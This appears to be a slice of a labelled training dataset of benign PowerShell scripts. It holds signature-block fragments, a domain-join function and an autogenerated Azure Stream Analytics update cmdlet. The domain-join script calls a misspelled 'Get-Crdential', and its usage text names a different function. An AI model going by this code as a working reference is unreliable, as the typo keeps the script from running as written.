nr3ZKibYMjaUbCNIDnxz2ykCAwEAAaOCAUkwggFFMB0GA1UdDgQWBBRvznuJ9SU2 # g5l/5/b+5CBibbHF3TAfBgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf # BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmww # bAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29m # dC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El # MjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUF # BwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAgEAiT4NUvO2lw+0 # dDMtsBuxmX2o3lVQqnQkuITAGIGCgI+sl7ZqZOTDd8LqxsH4GWCPTztc3tr8AgBv # sYIzWjFwioCjCQODq1oBMWNzEsKzckHxAzYo5Sze7OPkMA3DAxVq4SSR8y+TRC2G # cOd0JReZ1lPlhlPl9XI+z8OgtOPmQnLLiP9qzpTHwFze+sbqSn8cekduMZdLyHJk # 3Niw3AnglU/WTzGsQAdch9SVV4LHifUnmwTf0i07iKtTlNkq3bx1iyWg7N7jGZAB # RWT2mX+YAVHlK27t9n+WtYbn6cOJNX6LsH8xPVBRYAIRVkWsMyEAdoP9dqfaZzwX # GmjuVQ931NhzHjjG+Efw118DXjk3Vq3qUI1re34zMMTRzZZEw82FupF3viXNR3DV # OlS9JH4x5emfINa1uuSac6F4CeJCD1GakfS7D5ayNsaZ2e+sBUh62KVTlhEsQRHZ # RwCTxbix1Y4iJw+PDNLc0Hf19qX2XiX0u2SM9CWTTjsz9SvCjIKSxCZFCNv/zpKI # lsHx7hQNQHSMbKh0/wwn86uiIALEjazUszE0+X6rcObDfU4h/O/0vmbF3BMR+45r # AZMAETJsRDPxHJCo/5XGhWdg/LoJ5XWBrODL44YNrN7FRnHEAAr06sflqZ8eeV3F # uDKdP5h19WUnGWwO1H/ZjUzOoVGiV3gwggdxMIIFWaADAgECAhMzAAAAFcXna54C # m0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE # CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z # b2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0aWZp # Y2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIyMjVaFw0zMDA5MzAxODMy # MjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV # BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0B # AQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7VgtP97pwHB9KpbE51 # yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY # 6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gmU3w5YQJ6xKr9 # cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl3GoPz130/o5Tz9bshVZN # 7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoFVZhtaDua # Rr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I5JasAUq7vnGpF1tnYN74 # kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+AutuqfjbsNkz2 # K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/TNuvXsLz1dhzPUNOwTM5 # TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk # i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y1BzFa/ZcUlFdEtsluq9Q # BXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3Pmri # Lq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEwIwYJKwYBBAGCNxUC # BBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJl # pxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIB # FjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9y # eS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAweCgBTAHUA # YgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAU # 1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDovL2Ny # bC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0XzIw # MTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXRfMjAxMC0w # Ni0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/yp # b+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHkwo/7bNGhlBgi7ulm # ZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM # 9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2EhIRXT0n4ECW # OKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWKNsIdw2FzLixre24/LAl4 # FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZMcm8Qq3Uw # xTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+c23Kjgm9swFXSVRk2XPX # fx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVX # VAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGC # onsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU # 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEG # ahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo0MDFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaIjCgEBMAcGBSsOAwIaAxUAhGNHD/a7Q0bQLWVG9JuGxgLRXseggYMw # gYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQsF # AAIFAOrJ0ggwIhgPMjAyNDEwMjgwOTA0MDhaGA8yMDI0MTAyOTA5MDQwOFowdzA9 # BgorBgEEAYRZCgQBMS8wLTAKAgUA6snSCAIBADAKAgEAAgIIsAIB/zAHAgEAAgIS # xjAKAgUA6ssjiAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAow # CAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQAzScy1wBbp # cAxuJLYnsTb2C1R/1ZXPRTrV+7w4izx+oXOHAUu9aHGG0qSOBjk7VgyCvjFMirT1 # 1HILBBTHTiJcA1z5b5OIdys0RWWcnLCQGSKItm8KNNpeE+oE9viQRHMLsU/3b8hu # zWEHTDeOOyc8wNVIJCcPXDGQg42Yf1qMqoPpqyCmMTSjn3XQ0nllmNeGCeUkdIsN # TpwD4mbbVXPVq+KbVt/jatJZw3YrTnjzg1j5AdrolA/aN3CjM0gf25XwDETanz7K # LbHkfz5gxAN8qJTYbSOoyGTYr8cl5Rqrrp+0jwplK+S9FVUpwZNtKUwYSNiOSsA9 # S5bfDmOgcd8kMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAH+0KjCezQhCwEAAQAAAf4wDQYJYIZIAWUDBAIBBQCgggFKMBoG # CSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQgJ+wvKPEr # GceNlPIX3RdiIb3A1WMuWz2dvcPYhn1WocswgfoGCyqGSIb3DQEJEAIvMYHqMIHn # MIHkMIG9BCARhczd/FPInxjR92m2hPWqc+vGOG1+/I0WtkCstyh0eTCBmDCBgKR+ # MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMT # HU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB/tCowns0IQsBAAEA # AAH+MCIEIBHab5Kt80GYeIFqPjdXAVG0HIgzkQ3JSwH65KUaSnvoMA0GCSqGSIb3 # DQEBCwUABIICAKLd0O35yBKkD6akE0MPzH6zzDL1S9qVM/2G1HU10JkMuGs9WJ6X # dDX327w/U6dOP37k+9agHYP6AwEQ3yNqC6qoO4v4dqBW7kshTkgDvmcgfi79JWZP # DoU5HDdoya/Sw4aJ47APAdK5y+fT2RvXQRW2rU3JcAna743Sl7ydnilReEAevc7y # IRPXQ9NiRob3aN0u4C+df7GtUuhQWaKy+Z6O+xxnzpeDBRlT+7NnkJEIHYw8RaJ/ # PbjB9L5Bgsc6CMNFEzYzVQjscg5dW8i70z+lCWeEMAJQmWAW4DEDOd+gZtYxEBuL # L2jgHSGDbCGYCG/mmfR0OTELEJFGXamDuE2lRuPST0jRvNsgNtntoENKZNXUtJ8y # JF+Ab9RGHQ7vVnWiG/JSDG+64x24BA9XhOo+XewR2q+O2UznGi6wSk4mXcu/3/PS # 6gtJgHMzVjLZ8brhbBz5V9hzypzuHN8IYKhiJyC0nwJREWcYsMBzEvCSbeFTb4IL # JzMcq8kSOFOcAaYkmsYROTm5NO9B6rKWrcDQ/w4J/MDzqpqbXTdvHJ3DVTTgTn3s # TSm/hyXCkWIeAKDgEGS2n+j8vQJdIRi2Umhlrd3D/y8yJRdEklWiEK1FJZHHyZ1R # proeJhbkLLMkZaDbCk947BmjEUsiXxqW2mo43gOB40g+HDAVIus/cWys # SIG # End signature block
combined_dataset/train/non-malicious/Set-Domain_3.ps1
Set-Domain_3.ps1
function Set-Domain { param( [switch]$help, [string]$domain=$(read-host "Please specify the domain to join"), [System.Management.Automation.PSCredential]$credential = $(Get-Crdential) ) $usage = "`$cred = get-credential `n" $usage += "Set-AvaDomain -domain corp.avanade.org -credential `$cred`n" if ($help) {Write-Host $usage;exit} $username = $credential.GetNetworkCredential().UserName $password = $credential.GetNetworkCredential().Password $computer = Get-WmiObject Win32_ComputerSystem $computer.JoinDomainOrWorkGroup($domain ,$password, $username, $null, 3) }
combined_dataset/train/non-malicious/sample_44_99.ps1
sample_44_99.ps1
# ---------------------------------------------------------------------------------- # # Copyright Microsoft Corporation # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ---------------------------------------------------------------------------------- <# .Synopsis Updates an existing function under an existing streaming job. This can be used to partially update (ie. update one or two properties) a function without affecting the rest the job or function definition. .Description Updates an existing function under an existing streaming job. This can be used to partially update (ie. update one or two properties) a function without affecting the rest the job or function definition. .Example PS C:\> {{ Add code here }} {{ Add output here }} .Example PS C:\> {{ Add code here }} {{ Add output here }} .Inputs Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.IFunction .Inputs Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.IStreamAnalyticsIdentity .Outputs Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.IFunction .Notes COMPLEX PARAMETER PROPERTIES To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables. FUNCTION <IFunction>: A function object, containing all information associated with the named function. All functions are contained under a streaming job. [ConfigurationProperty <IFunctionConfiguration>]: [Binding <IFunctionBinding>]: The physical binding of the function. For example, in the Azure Machine Learning web service’s case, this describes the endpoint. Type <String>: Indicates the function binding type. [Input <IFunctionInput[]>]: [DataType <String>]: The (Azure Stream Analytics supported) data type of the function input parameter. A list of valid Azure Stream Analytics data types are described at https://msdn.microsoft.com/en-us/library/azure/dn835065.aspx [IsConfigurationParameter <Boolean?>]: A flag indicating if the parameter is a configuration parameter. True if this input parameter is expected to be a constant. Default is false. [Output <IFunctionOutput>]: Describes the output of a function. [DataType <String>]: The (Azure Stream Analytics supported) data type of the function output. A list of valid Azure Stream Analytics data types are described at https://msdn.microsoft.com/en-us/library/azure/dn835065.aspx [ETag <String>]: [PropertiesType <String>]: Indicates the type of function. FUNCTIONCONFIGURATIONPROPERTY <IFunctionConfiguration>: . [Binding <IFunctionBinding>]: The physical binding of the function. For example, in the Azure Machine Learning web service’s case, this describes the endpoint. Type <String>: Indicates the function binding type. [Input <IFunctionInput[]>]: [DataType <String>]: The (Azure Stream Analytics supported) data type of the function input parameter. A list of valid Azure Stream Analytics data types are described at https://msdn.microsoft.com/en-us/library/azure/dn835065.aspx [IsConfigurationParameter <Boolean?>]: A flag indicating if the parameter is a configuration parameter. True if this input parameter is expected to be a constant. Default is false. [Output <IFunctionOutput>]: Describes the output of a function. [DataType <String>]: The (Azure Stream Analytics supported) data type of the function output. A list of valid Azure Stream Analytics data types are described at https://msdn.microsoft.com/en-us/library/azure/dn835065.aspx INPUTOBJECT <IStreamAnalyticsIdentity>: Identity Parameter [ClusterName <String>]: The name of the cluster. [FunctionName <String>]: The name of the function. [Id <String>]: Resource identity path [InputName <String>]: The name of the input. [JobName <String>]: The name of the streaming job. [Location <String>]: The region in which to retrieve the subscription's quota information. You can find out which regions Azure Stream Analytics is supported in here: https://azure.microsoft.com/en-us/regions/ [OutputName <String>]: The name of the output. [ResourceGroupName <String>]: The name of the resource group. The name is case insensitive. [SubscriptionId <String>]: The ID of the target subscription. [TransformationName <String>]: The name of the transformation. .Link https://learn.microsoft.com/powershell/module/az.streamanalytics/update-azstreamanalyticsfunction #> function Update-AzStreamAnalyticsFunction { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.IFunction])] [CmdletBinding(DefaultParameterSetName='Update', PositionalBinding=$false, SupportsShouldProcess, ConfirmImpact='Medium')] param( [Parameter(ParameterSetName='Update', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')] [System.String] # The name of the streaming job. ${JobName}, [Parameter(ParameterSetName='Update', Mandatory)] [Alias('FunctionName')] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')] [System.String] # The name of the function. ${Name}, [Parameter(ParameterSetName='Update', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')] [System.String] # The name of the resource group. # The name is case insensitive. ${ResourceGroupName}, [Parameter(ParameterSetName='Update')] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')] [System.String] # The ID of the target subscription. ${SubscriptionId}, [Parameter(ParameterSetName='UpdateViaIdentity', Mandatory, ValueFromPipeline)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.IStreamAnalyticsIdentity] # Identity Parameter # To construct, see NOTES section for INPUTOBJECT properties and create a hash table. ${InputObject}, [Parameter(ParameterSetName='Update', Mandatory)] [Parameter(ParameterSetName='UpdateViaIdentity', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')] [System.String] # The name of the resource group. # The name is case insensitive. ${File}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Header')] [System.String] # The ETag of the function. # Omit this value to always overwrite the current function. # Specify the last-seen ETag value to prevent accidentally overwriting concurrent changes. ${IfMatch}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Azure')] [System.Management.Automation.PSObject] # The credentials, account, tenant, and subscription used for communication with Azure. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) begin { try { $functionParameters = Get-Content -Path $File | Out-String if ([Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.FunctionTypeConverter]::CanConvertFrom($functionParameters)) { $function = [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.FunctionTypeConverter]::ConvertFrom($functionParameters) } else { throw "The json format is invalid" } $PSBoundParameters.Add("Function", $function) $null = $PSBoundParameters.Remove("File"); $outBuffer = $null if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) { $PSBoundParameters['OutBuffer'] = 1 } $parameterSet = $PSCmdlet.ParameterSetName $mapping = @{ Update = 'Az.StreamAnalytics.private\Update-AzStreamAnalyticsFunction_Update'; UpdateViaIdentity = 'Az.StreamAnalytics.private\Update-AzStreamAnalyticsFunction_UpdateViaIdentity'; } if (('Update') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) { $PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id } $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters} $steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } } } # SIG # Begin signature block # MIInzgYJKoZIhvcNAQcCoIInvzCCJ7sCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDENhqCLzCKSrMQ # 0B2spnF4UDw5SKFOAOSIvzzBAdxyLKCCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # 